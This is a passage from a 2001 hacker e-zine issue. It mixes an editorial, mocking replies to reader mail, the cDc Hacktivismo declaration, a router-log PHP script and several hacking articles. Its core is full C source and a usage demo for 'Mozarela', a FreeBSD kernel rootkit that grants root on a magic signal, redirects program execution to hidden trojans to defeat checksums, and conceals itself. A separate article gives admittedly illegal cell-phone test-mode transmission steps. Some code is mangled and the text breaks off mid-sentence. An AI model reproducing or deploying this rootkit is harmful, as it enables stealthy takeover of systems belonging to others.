-------------------------------------------------------------------------------- _ _ _ _ _ | | / ) | | | | (_)_ | | / / ____ ____ ____ | | | |___ ____ ____ ____ _| |_ _ _ | |< < / _ ) _ ) _ \ \ \/ / _ )/ ___) _ |/ ___) | _) | | | | | \ ( (/ ( (/ /| | | | \ ( (/ /| | ( ( | ( (___| | |_| |_| | |_| \_)____)____)_| |_| \/ \____)_| \_||_|\____)_|\___)__ | (____/ -------------------------------------------------------------------------------- I S S U E (11) L e g i o n s o f t h e U n d e r g r o u n d -------------------------------------------------[www.legions.org]-------------- [LoU]=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=[LoU] W W W . L E G I O N S . O R G [LoU]=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=[LoU] [CONaENTS]------------------------------------------------------------[CONTENTS] [1]==============================[Editorial - Digital Ebola ] [2]=====================================================[KV Spam - The Readers ] [3]============================[Cell Shell - Morbid Angel ] [4][Getting the most from a Linksys Cable/DSL Router - pr00f ] [5]=======================[Mozarela Kernal Trojan - arkmp ] [6]======[A Newbies Guide To Sockets in PERL - Beowulf ] [7]===[Curiosity killed the American Citizen - Firewa11 ] [8]========[Microsoft's OpenSource Policy - Our Elite Spy ] [9]=============[PERL Headache of the Issue - Digital Ebola ] [10]=========================[Fun with XOSD - Digital Ebola ] [11]=====================[More PERL Madness - Digital Ebola ] [12]==========[CISCO PIX Connection Monitoring - DataShark ] [13]======================[Poor Man's Boards - BigGeezer ] [14]=================================[YAPOTTLK - Lawless ] [15]=================[I Got Windows, Now What? - Ntwak0 ] [16]=======[RIP - pr00f / alkinoos ] [17]=======================[Anti-Anti-Sniffer Patch - Vecna ] [18]====================[The Wait (fiction) - Digital Ebola ] [19]========================================[Carolyn Does It Again - Anonymous ] [20]==========================[Love's Freedom - Raschid ] [LoU]=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=[LoU] W W W . L E G I O N S . O R G [LoU]=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=[LoU] [Editorial]======================================================[Digital Ebola] Hello, and welcome to another late article of Keen Veracity. Oh, boy, is it ever so late. Month and months in the making you could say. Ah well, you know how it is, the economy these days, has no true friends. I was lucky, I survived two layoffs at a dot com, and then got axed in the final blow (100 or so people went with me). I have most certainly been on my toes. I have watched the jobs on the net dwindle down to almost nothing, and I am almost kind of excited: the industry is reshaping itself. Not only reshaping, but those annoying people who know dick about computers, network or security (I refer to one person, and they know who they are) will see themselves ousted for people that CAN do the work, for people that HAVE paid their dues. Not even a writing career will save these pathetic know-nothings. And the ones that are researching, reading, and creating, will be the ones that prosper. Hopefully. It is Midnight on July 12th, in this place I call home, on a nice little street in a nice little suburb of Dallas. Right now, people are preparing for Defcon. I am torn: I have just started a new job, as a Network Security Analyst. I MAY make it to Defcon, then again I may not. If I don't, I will next year, and I have attended the last two conferences. But I still have this nagging feeling that I should go. I hate that. Hopefully, this edition of KV will be finished BEFORE Defcon, and everyone may rejoice. And if I make it to Vegas this year, you can harrass me about the tardiness. =) I would like to dedicate this issue to several people: Sierra - I don't know what to say, except RIP. Texorcist - May you have the time of your life at Defcon, and I wish you the best with your wedding. DataShark - Erm. Natasha - Hang in there. and try to relax! Kris - *licks* Lawless - Pika...Pika... All of my former ER team. We survived! And a very special thanks to the Legions crew, and to the contributors to this issue of Keen Veracity. Now you guys can stop bugging me. =) [KV Spam]==========================================================[The Readers] Date: Thu, 5 Jul 2001 23:42:59 -0500 From: Dylan Brennan To: submit@legions.org Subject: where are u guys on irc? where are u guys on irc? /* We are cloaked. Actually, try Undernet #legions */ Date: Fri, 22 Jun 2001 21:18:26 +0200 From: Vladimir Dimitrijevic To: submit@legions.org Dear Legions, I'm Vladimir Dimitrijevic Graduated Electrical Engineer major: Computer science from Serbia. I admire your work with a cracks and I pleased you for help. Some political organization try to destroy my Internet cafe by giving their service for free. I need some hack assistance from you to stop them. Thank you. /* Well, we are TRYING to stay out of world affairs... */ Date: Wed, 13 Jun 2001 13:29:34 EDT From: Lvthec@aol.com To: submit@legions.org Subject: Pearl Harbour Survivor Research To whom this may concern, I am doing research on survivors (doctors, nurses, patients, ect.) that were in the hospitals on Dec. 7th and 8th. My goal is to try and talk to some of the people. Do you know where I could find records of names that served during that time period that would be open to the public? If you can help me out or give me any suggestions to better assist me, it would be most appreciated. Stewart Flick 474-0501 /* www.google.com - DUH! */ Date: Sun, 27 May 2001 19:33:14 -0000 From: Omer Ýscimenler To: submit@legions.org I'm a boy from Turkey and i really have a big desire to learn about these things if you could just show me where to start or just give me some time teach that would be great.I have a big intrest in computers and software and i have a lot of time so if you could just tell me where to start i gurantee you that i will become really good in a few years pls help me. _________________________________________________________________________ Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com. /* I didn't know you could get SPAM from Turkey... Uhh.. just keep reading guy... You will get better. I promise. Don't read Microsoft stuff though, read about UNIX... UNIX.. You want UNIX... */ Date: Sun, 13 May 2001 19:30:56 -0400 From: DORIS O'ROURKE To: submit@legions.org Subject: EMAIL Will you give email addresses out for free or money? Thanks /* For the right amount of money, sexual favors, or alcohol, many of us will do almost ANYTHING. I haven't quite decided about email addresses tho. */ Date: Tue, 24 Apr 2001 20:14:25 +0200 From: Ronald Lemmers To: submit@legions.org Subject: Worldonline... Dear Members of Legions of the underground, Recently worldonline www.worldonline.nl anounced that they have the best secure mail servers of all Dutch providers...Immediately all people thought they could say otherwise tried to hack there way into the mailservers.....Because I know people who work there and got access to internal information I asked them if someone allready gained access to one of those email servers from worldonline....If I have to believe my friends they say not a single soul gained access to the mail servers only the aministrators =-) so that would be fun if you want to try it out.....and test those good secure servers! You can mail worldonline if they want a challenge....Winner gets money....they like that kind of thingies you know...because I know the people who work there have a big influence on the whole company Greetz Rarekind! /* uhhh... I trust people like that, dude */ Date: Sun, 11 Feb 2001 16:18:48 -0000 From: john michael vicente To: submit@legions.org Subject: A NEWBIE WHO NEEDS HELP Hi Legions!!! I've just drop by your site and really want to be with.I know you are the best computer geniuses in the whole wide web so I thought if you want to help me to be like you. I admit that I am a newbie who really needs help from u. Could you please suggests what references,books,sites do I have to take because I dont know where to start. I what to know everything; from programming to networking to security,things like that. In short, I want to be like you guys. I hope you understand my situation because I hate to be an ignorant geek. Thanks a lot!!! john michael /* Why you mail us? Just go get some books! Use GOOGLE! =) */ Date: Mon, 12 Feb 2001 14:56:25 +0100 From: lars klei To: submit@legions.org can you help me get a hotmail password? I don't know where to ask? LARSKLEI@HOTMAIL.COM (THIS IS MY ACCOUNT) /* No. We do not support Hotmail. Or ANY Microsoft product. */ Date: Wed, 07 Feb 2001 15:22:48 -0000 From: Brian Johnson To: submit@legions.org Subject: i need help hi there, I've been sending thounsands of e.mails to some hackers to help me to hack some e.mail accounts ,but till now no one send me any reply... i'm really depressed... plz i need u to help me and send me an easy way to hack .. and please help me and reply me soon and don't make me wait for nothing ok.. either send me an easy way with the instructions and it would be better if u find a way without telling me send an e.mail to this and write....etc , or u can help me and i'll send u the e.mail i want to hack.. waiting your reply thanks /* Read! Google! READ! GOOGLE! PROZAC! READ! GOOGLE! */ From: MtororojoS13@aol.com To: submit@legions.org Subject: I forgot to say!!!! TOOLS IS THE BOBM!!!!!!!!!!!!! .............................::::::::::::::::::::::::::::::::::::::::>>>>>>>> D@rk Red Ph@ntom /* Uhhhhhh.. Yeah. */ Date: Sat, 3 Feb 2001 08:10:32 -0800 (PST) From: Osman Malik To: submit@legions.org Subject: RE:Leigons.org i want to join your haking gruop hoiw do i ? my email is cybermn9@yahoo.com /* I always wanted to be a haker. */ Date: Wed, 24 Jan 2001 00:41:00 EST From: Drkphantomangel@aol.com To: submit@legions.org Subject: qUiCk QuEsTiOn would you mind if i but a link to your page on mine cuz i think your page is the shit . thanks DrKpHaNtOmAnGeL /* Sure. Link all you want. */ Date: Thu, 18 Jan 2001 13:36:30 -0500 From: David Schiesl To: submit@legions.org Subject: subscribe /* Noooooooooo. I ain't no major dumb wh0re. */ Date: Sat, 30 Dec 2000 02:22:39 +0100 From: alex To: submit@legions.org Hi, Im a beginner hacker and i want to join your group, to learn more about hacking... U may have a use of me, cuz i can spend like 15 h with my comp and i promise u i learn very quick.. I´ll do anything to join... /* Anything? Would you read, graduate high school, and college? */ From: "[iso-8859-1] Jonas Lindström" To: submit@legions.org Subject: membership hey how do i get a membership? For Your Eyes Only Mvh: Jonas /* Pay me money. */ Date: Thu, 28 Dec 2000 04:41:23 -0500 (EST) From: blackstone reche To: submit@legions.org Subject: suscribe group Hi, i'm Blackstone i visited some of your hacked site i love how you break-in the rascist web site i don't live people who whant white power i'm black man and nothing can change this we are all the people the same and . bye +++++++++++++++++++++++++++++++ i speak french but i know some english /* I speak english, but I know some french... */ Date: Mon, 25 Dec 2000 14:19:43 -0500 (EST) From: chris To: submit@legions.org Subject: Joining I have what it takes to be one of you and then some. Believe me when i tell you that. I can take care of any thing you need done. -Zer0kewL /* Good. Start with my laundry, and then wash my car. */ Date: Thu, 5 Jul 2001 09:45:37 -0700 (PDT) From: Grandmaster Ratte' To: yermomma@cultdeadcow.com Cc: /* Omitted, cause DAMN, thats alot of addresses */ Subject: cDc Msg Of Hope-July 4 _ _ ((___)) cDc communications [ x x ] & HACKTIVISMO \ / "A Special Message of Hope" (' ') July 4th, 2001 (U) FOR IMMEDIATE RELEASE INTERNATIONAL BOOKBURNING IN PROGRESS [July 4, 2001 - LUBBOCK, TX.] Free speech is under siege at the margins of the Internet. Quite a few countries are censoring access to the Web through DNS [Domain Name Service] filtering. This is a process whereby politically incorrect information is blocked by domain address -- the name that appears before the dot com suffix. Others employ filtering which denies politically or socially challenging subject matter based on its content. Hacktivismo and the CULT OF THE DEAD COW have decided that enough is too much. We are hackers and free speech advocates, and we are developing technologies to challenge state-sponsored censorship of the Internet. Most countries use intimidation and filtering of one, kind or another including the Peoples Republic of China, Cuba, and many Islamic countries. Most claim to be blocking pornographic content. But the real reason is to prevent challenging content from spreading through repressive regimes. This includes information ranging from political opinion, "foreign" news, women's issues, academic and scholarly works, religious information, information regarding ethnic groups in disfavor, news of human rights abuses, documents which present drugs in a positive light, and gay and lesbian content, among others. The capriciousness of state-sanctioned censorship is wide-ranging. [1] * In Zambia, the government has attempted to censor information revealing their plans for constitutional referendums. * In Mauritania -- as in most countries --, owners of cybercafes are required to supply government intelligence agents with copies of e-mail sent or received at their establishments. * Even less draconian governments, like Malaysia, have threatened web-publishers for violating their publishing licenses by publishing frequent updates: _timely, relevant_ information is seen as a threat. * South Korean's national security law forbids South Koreans from having any contact -- including contact over the Internet -- with their North Korean neighbors. * Sri Lanka threatened news sites with possible revocation of their licenses if coverage of a presidential election campaign was not partial to the party of the outgoing president. The risks of accessing or disseminating information are often great. * In Ukraine, a decapitated body found near the village of Tarachtcha is believed to be that of Georgiy Gongadze, founder and editor of an on-line newspaper critical of the authorities. * In August, 1998, eighteen year old Turk Emre Ersoz was found guilty of "insulting the national police" in an Internet forum after participating in a demonstration that was violently suppressed by the police. His ISP provided the authorities with his address. * Journalist Miroslav Filipovic has the dubious distinction of having been the first Journalist accused of spying because of articles published on the Internet -- in this case detailing the abuses of certain Yugoslav army units in Kosovo. We are sickened by these egregious violations of information and human rights. The liberal democracies have talked a far better game than they've played on access to information. But hackers are not willing to watch the custodians of the International Convention on Civil and Political Rights and the Universal Declaration of Human Rights turn them into a mockery. We are willing to put our money where our mouth is. Hacktivismo and the CULT OF THE DEAD COW are issuing the HACKTIVISMO DECLARATION as a declaration of outrage and a statement of intent. It is our Magna Carta for information rights. People have a right to reasonable access of otherwise lawfully published information. If our leaders aren't prepared to defend the Internet, we are. --------------------------------------------------------------------- [1] some information cited in this press release was either paraphrased, or quoted directly, from the "Enemies of the Internet" report published by Reporters Without Frontiers, and may be found at http://www.rsf.fr />/>/>/>/>/>/>/>/>/>/>/>/>/>/>/>/>/>/>/>/>/>/>/>/>/>/>/>/>/>/>/>/>/>/>/> THE HACKTIVISMO DECLARATION assertions of liberty in support of an uncensored internet DEEPLY ALARMED that state-sponsored censorship of the Internet is rapidly spreading with the assistance of transnational corporations, TAKING AS A BASIS the principles and purposes enshrined in Article 19 of the Universal Declaration of Human Rights (UDHR) that states, _Everyone has the right to freedom of opinion and expression; this right includes freedom to hold opinions without interference and to seek, receive and impart information and ideas through any media and regardless of frontiers_, and Article 19 of the International Covenant on Civil and Political Rights (ICCPR) that says, 1. Everyone shall have the right to hold opinions without interference. 2. Everyone shall have the right to freedom of expression; this right shall include freedom to seek, receive and impart information and ideas of all kinds, regardless of frontiers, either orally, in writing or in print, in the form of art, or through any other media of his choice. 3. The exercise of the rights provided for in paragraph 2 of this article carries with it special duties and responsibilities. It may therefore be subject to certain restrictions, but these shall only be such as are provided by law and are necessary: (a) For respect of the rights or reputations of others; (b) For the protection of national security or of public order, or of public health or morals. RECALLING that some member states of the United Nations have signed the ICCPR, or have ratified it in such a way as to prevent their citizens from using it in courts of law, CONSIDERING that, such member states continue to willfully suppress wide-ranging access to lawfully published information on the Internet, despite the clear language of the ICCPR that freedom of expression exists in all media, TAKING NOTE that transnational corporations continue to sell information technologies to the world's most repressive regimes knowing full well that they will be used to track and control an already harried citizenry, TAKING INTO ACCOUNT that the Internet is fast becoming a method of repression rather than an instrument of liberation, BEARING IN MIND that in some countries it is a crime to demand the right to access lawfully published information, and of other basic human rights, RECALLING that member states of the United Nations have failed to press the world's most egregious information rights violators to a higher standard, MINDFUL that denying access to information could lead to spiritual, intellectual, and economic decline, the promotion of xenophobia and destabilization of international order, CONCERNED that governments and transnationals are colluding to maintain the status quo, DEEPLY ALARMED that world leaders have failed to address information rights issues directly and without equivocation, RECOGNIZING the importance to fight against human rights abuses with respect to reasonable access to information on the Internet, THEREFORE WE ARE CONVINCED that the international hacking community has a moral imperative to act, and we DECLARE: * THAT FULL RESPECT FOR HUMAN RIGHTS AND FUNDAMENTAL FREEDOMS INCLUDES THE LIBERTY OF FAIR AND REASONABLE ACCESS TO INFORMATION, WHETHER BY SHORTWAVE RADIO, AIR MAIL, SIMPLE TELEPHONY, THE GLOBAL INTERNET, OR OTHER MEDIA. * THAT WE RECOGNIZE THE RIGHT OF GOVERNMENTS TO FORBID THE PUBLICATION OF PROPERLY CATEGORIZED STATE SECRETS, CHILD PORNOGRAPHY, AND MATTERS RELATED TO PERSONAL PRIVACY AND PRIVILEDGE, AMONG OTHER ACCEPTED RESTRICTIONS. BUT WE OPPOSE THE USE OF STATE POWER TO CONTROL ACCESS TO THE WORKS OF CRITICS, INTELLECTUALS, ARTISTS, OR RELIGIOUS FIGURES. * THAT STATE SPONSORED CENSORSHIP OF THE INTERNET ERODES PEACEFUL AND CIVILIZED COEXISTENCE, AFFECTS THE EXERCISE OF DEMOCRACY, AND ENDANGERS THE SOCIOECONOMIC DEVELOPMENT OF NATIONS. * THAT STATE-SPONSORED CENSORSHIP OF THE INTERNET IS A SERIOUS FORM OF ORGANIZED AND SYSTEMATIC VIOLENCE AGAINST CITIZENS, IS INTENDED TO GENERATE CONFUSION AND XENOPHOPIA, AND IS A REPREHENSIBLE VIOLATION OF TRUST. * THAT WE WILL STUDY WAYS AND MEANS OF CIRCUMVENTING STATE SPONSORED CENSORSHIP OF THE INTERNET AND WILL IMPLEMENT TECHNOLOGIES TO CHALLENGE INFORMATION RIGHTS VIOLATIONS. Issued July 4, 2001 by Hacktivismo and the CULT OF THE DEAD COW. Relevant Web Links: Universal Declaration of Human Rights http://www.un.org/Overview/rights.html International Covenant on Civil and Political Rights http://www.unhchr.ch/html/menu3/b/a_ccpr.htm Reporters Without Frontiers http://www.rsf.fr CULT OF THE DEAD COW http://www.cultdeadcow.com == Media Contact: Oxblood Ruffin Foreign Minister CULT OF THE DEAD COW oxblood@cultdeadcow.com http://cultdeadcow.com __//////\ -cDc- CULT OF THE DEAD COW -cDc- /\\\\\\__ Est. 1984 \\\\\\/ NINJA STRIKE FORCE * HACKTIVISMO \////// Est. 1984 #### We will have more to say. /* We gotz your back, dead cow brothers. */ ============================================================================== Got a news story? Send it to editor@legions.org - We are working to put up a semi cool news site, and it would be most excellent of each and every one of you to send us news stories and links. ============================================================================== [Cell Shell]======================================================[Morbie Angel] This hasn't been fully tested (I've only tested the shell portion. It's up to you to try out the PPP connection. In theory, it should work, but it's going to be really slow.) And be forewarned, this is illegal. Everything you do based on this is your choice, not mine. I am only supplying information, and I am not responsible for your actions. If the FCC comes a knocking, don't be bitching to me or LoU about your legal engagements. It is your fault if you get caught doing any of the below in practice. Not mine. The idea came to me a few months ago when I was in my friend's car, wishing that I could nab a few files off my system when we were on the road. It completely dawned on me a few minutes later when I was playing with my Motorola 2800 bagphone. I had to find a way to make a network connection to my main server back at my (old) house. And I figured cellular communication was the way to go. I went home later that day, and dug around my box full of (mostly) various electronics and phone equipment. I found an old US Robotics 28.8 ext. modem, RJ-11 -> Motorola TeleTAC adapter (For modems, duh.) and my old acoustic coupler. I threw the external modem on my server, then ran some RJ11 to the adapter, and connected the adapter to the TeleTAC. Whee. Now, client side, I popped the coupler onto the 2800, then connected it to my amazing 14.4 on the lappy. Now how the fuck did I establish the god damn connection? This is going to be a bit lengthy, so let's list it out. 1) I edited my inittab (/etc/inittab) and added a dialup term. (You can find it.) 2) Popped both cellphones into testmode. Nothing like FCN-00-**-83786633-STO. Then I popped them onto an unused channel. And then (gasp) put them into Rx/Tx mode by doing the following. a) 08# b) 10# c) 05# d) 353# Oh my. I think we can hear ourselves talk over the channel. Isn't that special? 3) On the external modem, I threw a switch on it that said 'Auto Answer'. Now, I realize this isn't on all Externals, and I should recommend that you find one, wheter it's at a Goodwill, or a vintage computer store. 4) Started minicom on the laptop. And typed in the magical string, ATD. Boom. That's all it took. I got an amazing 19.2 connection over the cellular link. Now, could you get a higher connection with faster modems? No, dumb ass. You can probably get a 28.8 connection, but it will most likely time out. Now, unless you have some really old towers around your area that actually forward channels through different towers (i.e. You're driving down the road, and you're out of the original tower's range, then you switch over.) you're going to get disconnected if you pass the limited range of your tower, which is anywhere between 6 to 10 miles. There is only a couple ways around that, but I'm sure you can figure them out within a few hours, minutes, or seconds from now. Okay, so you have yourself a cellular shell. Whoop dee doo. Now if you can actually make a networked connection over the link, that would be nice, eh? Well, using the wonderful PPP protocol, we can! Add a new user on your host, name it whatever the fuck you want. Now, for the shell, make sure it's /u sr/sbin/pppd. Make a new file in your favorite editor called .ppprc and put it in the user's $home. Put the following in it. connect -detach modem crtscts lock :192.168.100.4 Whoop, there it is. Now on the client side, make a ppp script that logs in as that user. And that's all she wrote. It should work, but I make no guarantees whatsoever, since I never tested it. So play around with it, if you dare. Mail me some followups, additions, and so on also, I'd like to hear some new ideas to add to this simple project. Next time, I'll get in depth with more wireless networking projects for your geeky enjoyment. [LinkSys DSL Router]=====================================================[pr00f] A few months back I bought a 4-port Linksys cable/DSL router (model BEFSR41) for a quick and easy way of sharing my broadband connection between the boxen on my network. At the time I was more concerned with reliability than I was feature set, and from past experience, I'd come to know Linksys as a reliable vendor (up until recently, but we won't get into that). Anyway, a few weeks ago I was playing with the various settings on the router and noticed the logging options. Now looking at the manual, I couldn't find anything about this function. In fact, the screen shots in the manual didn't even show the Log tab. Apparently they added the logging functionality in a firmware update and I'd missed the change. Looking on Linksys' web site didn't help any either. So I decided to do some of my own research. When you log into the router's web-based administration utility, you'll see the Log tab second from the right. Clicking on it will give you a couple options; enable/disable access logging and entering a local IP address to send the log to. Without documentation this was going to be interesting. So, I entered the IP address of one of my Linux boxen and submitted the changes. I then asked a friend to telnet to me, just to try and see what kind of activity the router would produce and send to the box. An SNMP trap is sent to the box. Logical enough. The trap contains the direction of the traffic, either @in or @out, the IP address of the source, and the IP address of the destination. Not exactly the most useful logging feature in existence, but it'll do the trick for simple monitoring of network activity to and from the Internet. The next thing I did was setup snmptraplogd to capture the traps from the router. This provided me a decent log of the day's events. I proceeded to write a short PHP script to parse the log in real time, providing a convenient way to monitor the logs. Here's the PHP code I'm using: --- BEGIN SNIP --- All |"); print("Blocked |"); print("Incoming |"); print("Outgoing ]\n"); print("

\n"); print("$filter Traffic
\n"); // Make sure the log is readable by Apache (usually www-data) $filepointer = fopen("/var/log/snmptrapd.log", "r"); while (!feof($filepointer)) { $fileline = fgets($filepointer, 1024); if (strlen($fileline) > 0) { $spaceloc = strpos($fileline, " "); $timedate = substr($fileline, 0, $spaceloc); $messageloc = strpos($fileline, "@"); if ($messageloc > 0) { $message = substr($fileline, $messageloc,strlen($fileline) - $messageloc - 3); $year = substr($timedate, 0, 4); $month = substr($timedate, 4, 2); $day = substr($timedate, 6, 2); $hour = substr($timedate, 9, 2); $minute = substr($timedate, 11, 2); $second = substr($timedate, 13); $date = "$month/$day/$year"; $time = "$hour:$minute:$second"; $type = substr($message, 0, 2); if (strlen($filter) == 0) $filter = "All"; if ($filter == "All") { $parts = explode(" ", $message); print("$date $time - $parts[1]:$parts[2] >$parts[3]:$parts[4]
\n"); } elseif ($filter == "Incoming") { if ($type == "@i") { $parts = explode(" ", $message); if ($parts[3] != "router") print("$date $time - $parts[1]:$parts[2] >$parts[3]:$parts[4]
\n"); } } elseif ($filter == "Outgoing") { if ($type == "@o") { $parts = explode(" ", $message); print("$date $time - $parts[1]:$parts[2] >$parts[3]:$parts[4]
\n"); } } elseif ($filter == "Blocked") { if ($type == "@i") { $parts = explode(" ", $message); if ($parts[3] == "24.x.x.x") // CHANGE THIS -- It should be your router's external IP address print("$date $time - $parts[1]:$parts[2] >router:$parts[4]
\n"); } } } } } fclose($filepointer); ?> --- END SNIP --- [Mozarela Kernal Trojan]=================================================[arkmp] -- M O Z A R E L A K E R N E L T R O J A N -- -- for FreeBSD 4.x -- hi, other info about kernel loadable under freebsd can be found at http://www.thehackerschoice.com on the Pragmatic's tutorial. Usually we see linux rootkit placed on kernel module, but for freebsd 4.x isn't ever coded nothing. This code (after the code you may find some explanation) is a simple freebsd rootkit named "mozarela" with some functions. ------------------------------------------------- cut here ----------- #include #include #include #include #include #include #include #include #include #include #include /* * $mozarela coded 26/01/2001 - some parts of code and ideas are from * vecna@s0ftpj.org and him "spapem" (anti securelevel project) * http://www.s0ftpj.org some info are from "Attacking FreeBSD with kernel * modules" by Pragmatic (THC) http://www.thehackerschoice.com */ #define MOD_NAME "mozarela.ko" struct couple { char oldexec[32]; char newexec[32]; }; static int super_power, mozarela_warn; static void check_dirname(struct proc *, char *, int); static int mozarela_chdir(struct proc *p, struct chdir_args *uap) { check_dirname(p, uap->path, strlen(uap->path)); return chdir(p, uap); } static int mozarela_kill(struct proc *p, struct kill_args *uap) { if(super_power && uap->signum == 31) { struct proc *magic; if(!(magic =pfind(uap->pid))) return ESRCH; else { magic->p_cred->pc_ucred->cr_uid =0; magic->p_cred->p_ruid =0; magic->p_cred->p_svuid =0; magic->p_cred->p_rgid =0; magic->p_cred->p_svuid =0; super_power =0; return(0); } } else return kill(p, uap); } static int mozarela_execve(struct proc *p, struct execve_args *uap) { if(uap->fname !=NULL) { static struct couple execred[3] = { { "/bin/ls","/dev/a" }, { "/bin/su","/dev/b" }, { "/bin/rm","/dev/c" } /* * READ READ READ READ article before ANY CHANGE - if you put * the second name bigger than first you may cause kernel panic */ }; int size =sizeof(execred) / sizeof(struct couple); while(size >= 0) { if(!strcmp(execred[--size].oldexec, uap->fname)) { memcpy(uap->fname, &execred[size].newexec, sizeof(execred[size].newexec)); uap->fname[sizeof(execred[size].newexec)+1]=0; } } } return execve(p, uap); } static int mozarela_kldstat(struct proc *p, struct kldstat_args *uap) { int ret = kldstat(p, uap); if(!ret && uap->stat->name !=NULL) if(!strcmp(uap->stat->name, MOD_NAME)) mozarela_warn =p->p_pid; return ret; } static int mozarela_write(struct proc *p, struct write_args *uap) { if(mozarela_warn && mozarela_warn == p->p_pid) mozarela_warn =uap->nbyte =0; return write(p, uap); } static struct sysent mozarela[5] = { { 1, (sy_call_t *) mozarela_chdir }, { 2, (sy_call_t *) mozarela_kill }, { 3, (sy_call_t *) mozarela_execve }, { 3, (sy_call_t *) mozarela_write }, { 2, (sy_call_t *) mozarela_kldstat } }; static int init_module(module_t mod, int cmd, void *arg) { int ret = 0; switch (cmd) { case MOD_LOAD: sysent[SYS_chdir] =mozarela[0]; sysent[SYS_kill] =mozarela[1]; sysent[SYS_execve] =mozarela[2]; sysent[SYS_write] =mozarela[3]; sysent[SYS_kldstat] =mozarela[4]; uprintf("mozarela loadated\n"); break; case MOD_UNLOAD: sysent[SYS_chdir].sy_call =(sy_call_t *)chdir; sysent[SYS_kill].sy_call =(sy_call_t *)kill; sysent[SYS_execve].sy_call =(sy_call_t *)execve; sysent[SYS_write].sy_call =(sy_call_t *)write; sysent[SYS_kldstat].sy_call =(sy_call_t *)kldstat; break; default: ret = EINVAL; break; } return(ret); } static struct moduledata mozarela_moddata = { "mozarela", init_module, NULL }; DECLARE_MODULE(syscall, mozarela_moddata, SI_SUB_DRIVERS, SI_ORDER_MIDDLE); static void check_dirname(struct proc *p, char *dir, int len) { if(len != 3) return; /* * "cd \*CC" can activate kill trojan */ if(dir[0] == '*' && dir[1] == 'C' && dir[2] == 'C') super_power++; } ------------------------------------------------- cut here ----------- on this code we can find redirection of this system call: chdir kill execve write kldstat sometime chdir is used for change working directory, kill for send signal to a process, execve for execute executable file, write for any writing procedure (file socket standard output ...) kldstat to see started module. this kld have this special abilities: 1) change uid/gid/euid/egid to root to specificated process. 2) make exec redirection, you may put some troian under /usr/share/man9/CVS/ or other directory and redir execution ... example ... if you want execute your login troian usually copy your troian over /bin/login, but a checksum checker can discover it (because the md5sum of file is been changed) with this system you may put new binary and execute this also keeping original binary file :) 3) make hiding self. other implementation if think that are superflue, because with execve redir you may truly make anything... if you want hide your files i can code redirection of getdirentries(2) or getdents(2) but is more easy and lower dangerous put you ls trojan and redir execution, some for login, w, netstat and others, on /usr/src/ you may find all freebsd source is very simple change it for various pourpose :) -- L I T T L E K L D I N F O -- The kld can modify ANY block of kernel, btw sometimes kld redir syscall or cdevsw functions, or other simple pointer to function on linked file. If you want make an idea with ALL syscall that you can redir, you can see /usr/src/sys/sys/syscall.h, you can search how system call is used whit /usr/share/man/man2/* man pages and with utility ktrace and kdump you may find how syscall is used under program (if you don't want grep on the code or if code use a wrapper) with # ktrace ./code args args # kdump | more and read all system call used during execution. i don't explain internals of coding at kernel space under freebsd, but any system call can be redirect as function pointer, as argument any system call take: function_name(struct proc *, struct [system_call_name]_args *); on [system_call_name]_args you may find the argument passed from userspace... eg. kill(2) have prototipe as: kill(int, int); kill_args struct is a struct with 2 int declared inside. usually for find the original code I use grep [system_call_name]_args /usr/src/sys/kern/*.c this info can help you on the comprension of kld functions, you may find on the kernel source any other question, if you want hack this simple kld only two or three houres to hack can resolve your problem, if you wannabe a kernel hacker, i suggest to subscribe at freebsd-hackers@FreeBSD.ORG with majordomo@freebsd.org, read any kernel papers on www.freebsdzine.org (GREAT! :) and read a lots of kernel code :) -- H O W U S E M O Z A R E L A -- # ls -l lrwxr-xr-x 1 root wheel 12 Jan 27 18:38 @ -> /usr/include -rw-r--r-- 1 root wheel 157 Jan 26 16:24 Makefile -rw-r--r-- 1 arkmp arkmp 6214 Jan 29 15:26 arkmp.kv11 -rw-r--r-- 1 root wheel 4447 Jan 27 21:32 mozarela.c -rwxr-xr-x 1 root wheel 4937 Jan 27 21:32 mozarela.ko -rwxr-xr-x 1 root wheel 24937 Jan 27 21:32 my_ls # mkdir ARK # mv my_ls ARK # ln -s /dev/a /home/arkmp/keen/ARK/my_ls # ls -l /dev/a lrwxr-xr-x 1 root wheel 13 Jan 22 01:50 /dev/a -> /home/arkmp/keen/ARK/my_ls # kldload ./mozarela.ko mozarela loadated # ls -l lrwxr-xr-x 1 root wheel 12 Jan 27 18:38 @ -> /usr/include -rw-r--r-- 1 root wheel 157 Jan 26 16:24 Makefile -rw-r--r-- 1 arkmp arkmp 6214 Jan 29 15:26 arkmp.kv11 -rw-r--r-- 1 root wheel 4447 Jan 27 21:32 mozarela.c -rwxr-xr-x 1 root wheel 4937 Jan 27 21:32 mozarela.ko (and ARK my dir isn't appears because my_ls trojan DON'T SHOW file/dir with ARK on name, and /bin/ls isn't modify, md5sum appears intact, but isn't execute :) # ps axu [cut] root 203 0.0 6.0 2092 1240 ?? Is 2:19PM 0:03.43 telnetd arkmp 204 0.0 1.7 488 340 p0 Is 2:19PM 0:00.14 -csh (csh) arkmp 251 0.0 6.6 1588 1368 p0 I+ 3:08PM 0:04.73 vi arkmp.kv11 root 296 0.0 6.3 2092 1312 ?? Ss 4:11PM 0:00.24 telnetd arkmp 297 0.0 1.7 488 356 p1 Is 4:11PM 0:00.13 -csh (csh) root 314 0.0 1.7 480 348 p1 S 4:17PM 0:00.11 _su (csh) root 0 0.0 0.0 0 0 ?? DLs 2:01PM 0:00.01 (swapper) # cd \*CC *CC: No such file or directory. # kill -31 251 # ps axu | grep vi root 251 0.0 6.6 1588 1368 p0 I+ 3:08PM 0:04.94 vi arkmp.kv11 # and my session has now uid/gid euid/egid 0 :) why i use symbolic link ? because, for make more little kld my function for redire execve contains the follow code: static struct couple execred[3] = { { "/bin/ls","/dev/a" }, { "/bin/su","/dev/b" }, { "/bin/rm","/dev/c" } }; int size =sizeof(execred) / sizeof(struct couple); while(size >= 0) { if(!strcmp(execred[--size].oldexec, uap->fname)) { memcpy(uap->fname, &execred[size].newexec, sizeof(execred[size].newexec)); uap->fname[sizeof(execred[size].newexec)+1]=0; } } you may see that if the second name is more bigger than first name, the function: 